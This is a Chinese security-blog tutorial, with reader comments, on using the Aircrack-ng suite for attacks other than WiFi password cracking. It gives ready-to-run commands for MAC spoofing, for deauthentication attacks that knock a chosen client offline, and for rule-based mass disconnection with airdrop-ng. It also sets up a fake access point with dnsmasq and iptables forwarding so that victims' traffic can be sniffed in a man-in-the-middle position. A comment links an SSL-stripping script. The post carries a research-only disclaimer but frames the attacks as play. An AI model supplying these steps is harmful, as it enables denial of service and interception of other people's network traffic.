Aircrack除破解WiFi密码外的趣味玩法

2015-03-03 +19 1242104人围观 ,发现 36 个不明物体 无线安全网络安全

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

Aircrack这种屌爆了的攻击测试套件在网上居然只有用它破解WiFi密码的教程,在这里我来扒个冷门,介绍下这款杀器的其他一些有趣的玩法。

0×00:首先你需要一张usb无线网卡

ifconfig查看可以正常识别,如果不行看这里。

0×01:干坏或者不坏的事情前先修改MAC

ifconfig [INTERFACE] down#关闭网卡

#[INTERFACE]是指你的无线网卡,一般为wlan0,下不再说明

macchanger -m [MAC] [INTERFACE]#修改MAC,[MAC]是你要改为的MAC地址,后面是你的网卡

#可以macchanger –help查看帮助信息

ifconfig [INTERFACE] up#打开网卡

0×02:把无线网卡切换到监听模式

#首先ifconfig可以看见有无线网卡然后

ifconfig wlan0 down #wlan0可能需要更换为你的网卡,一般默认都为wlan0
airmon-ng #查看当前网卡情况
airmon-ng start wlan0
airmon-ng #查看是否打开成功
ifconfig wlan0 up

iwconfig mon0  #查看Mode是不是Monitor(监听模式)

停止的命令:

airmon-ng stop mon0

0×03:获取/保存当前环境的WiFi信息

airodump-ng mon0 #收集wifi范围内的所有无线信息,Ctrl+c停止

#BSSID是mac地址,PWR是信号强度,后面是收集到的数据量,CH是信道,再后面是加密方式和ESSID

#见下图

#语法:airodump-ng –channel [x] –bssid [bssid] –write [filename] [interface?mon0]

#在我的环境下,命令如下

airodump-ng --channel 11 --bssid 24:05:0F:22:EF:82 --write babylove mon0

#将会把文件保存在当前目录下,一filename-01命名的三个文件,可以不加–write和参数,将不保存

0×04:初级断网攻击

#也就是传说的Deauthentication攻击

airodump-ng --channel 11 --bssid 24:05:0F:22:EF:82 mon0#查看当前环境的WiFi连接情况
aireplay-ng --deauth 10000 -a 24:05:0F:22:EF:82 -c 84:A6:C8:77:FF:F6 mon0 #对目标实现攻击

#见下图

#根据需要可以添加参数-e 11 –ignore-negative-one

#指定信道,忽略错误

#见下图

0×05:高级断网攻击

#可以自定义一个规则文件,是这个规则下的目标无法连接到WiFi网络,首先确保你的Aircrack套件中包含airdrop-ng,如下图测试:

#创建一个文件,airdeo-rules.txt,

#简单说来这个文件只保存三个参数,第一个参数a或者d,表示可以连接或者拒绝第三个参数所表示的客户机连接到第二个参数所表示的AP;

#第一个和第二个参数用/连接;

#第二个参数是AP的MAC地址,可以使any就是我们无线网卡所能监测到的所有热点;

#第二个和第三个参数用|链接;

#第三个参数是客户机的MAC地址,可以使any或者是Apple, Inc;APPLE COMPUTER;APPLE COMPUTER, INC.;Apple Computer Inc.;APPLE COMPUTER INC.;APPLE, INC等,来是的这些客户允许或者拒绝链接AP。

#创建好文件后保存在当前目录下,就是收集到的信息保存的目录中,一般为home中。

airodump-ng --write airdrop-test-file --output-format csv mon0

#收集到足够多的信息后ctrl+c

#airodump-ng 攻击并将数据保存在airdrop-test-file-01.csv的文件里

airdrop-ng -t airdrop-test-file-01.csv -r airdeo-rules.txt -i mon0

#使用airdrop攻击,调用前面收集到的信息文件,使用刚才穿件的rules规则和mon0网卡攻击。

0×06:最叼叼的部分,虚假AP/MITM攻击

#安装简单的dns服务

apt-get install dnsmasq

#确认有/etc/dnsmasq.conf,并如下写入服务规则

echo -e "interface=at0\ndhcp-range=192.168.0.50,192.168.0.150,12h" > /etc/dnsmqsq.conf

#开启AP语法:airbase-ng -e [network name] -c [channel] [interface]

airbase-ng -e fake-ap -c 6 mon0

现在应该就已经可以搜到虚假ap了,不过还连接不上。

新开启一个终端:

ifconfig at0 192.168.0.1 up

#设置iptables的转发规则

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT

#把虚假AP的无线网卡和我们正常上网的网卡关联,是连接到虚假AP的人可以上网

iptables -t nat -A POSTROUTING -o [internet interface] -j MASQUERADE
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

#开启dns服务

dnsmasq
echo "1" > /proc/sys/net/ipv4/ip_forward

#如果出现Got channel -1, expected a value > 0.错误,执行:

#ifconfig wlan0 down

#也就是关掉用来开启嗅探模式的那个网卡就行

#在新的终端里执行完命令后其他终端就可以连接上虚假AP了,如下图

#然后打开Wireshark开始抓吧(注意选择at0或者你指定的哪个虚假AP的网卡),所有流量都是通过你的虚假AP走的,如下图.

还不是想抓什么抓什么,玩玩中间人不也很好~

[作者/D_M,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]

相关推荐

这些评论亮了

  • 菜鸽 回复
    大牛, 我很穷, 我只有一个360随身wifi
    问,如何让kali驱动起来?当然,重要的事,驱动起来后效果会凑合还是差劲
    )22( 亮了
  • D_M (2级) 回复
    文中跳转跪了,网卡识别有问题可以参考这里:http://www.tinydawn.com/?post=42
    )18( 亮了
  • 周鸿祎 回复
    @ 菜鸽 360wifi信号差,驱动看使用芯片,去mediatek.com找。更推荐u盘安装kali,自带的无线网卡,信号好很多。
    )15( 亮了
  • nobita 回复
    输入 airbase-ng -e fake-ap -c 6 mon0 后显示
    error opening tap device: No such device
    try "modprobe tun"
    error opening tap device: No such device
    请问这是什么原因?
    )13( 亮了
  • 测试 回复
    学习一下,我也有一个思路,先让对方断网,然后执行airssl_kali.sh,然后就可以坐等了。当然这里也有一个问题,如果别人的wifi是有密码的你还需要破解它的密码,airssl_sh.sh 如何开启一个有密码的无线热点呢?求指教?
    airssl_kali.sh
    https://raw.githubusercontent.com/fastlorenzo/tools/29aafb9bb70804745e7996ef5b06fab5d30c75ce/pentest/wireless/airssl/airssl_kali.sh
    )10( 亮了
发表评论

已有 36 条评论

取消
Loading...
D_M

这家伙太懒,还未填写个人描述!

1 文章数 10 评论数 0 关注者

特别推荐

文章目录

    文章目录

      推荐关注

      官方公众号

      聚焦企业安全

      活动预告

      填写个人信息

      姓名
      电话
      邮箱
      公司
      行业
      职位
      css.php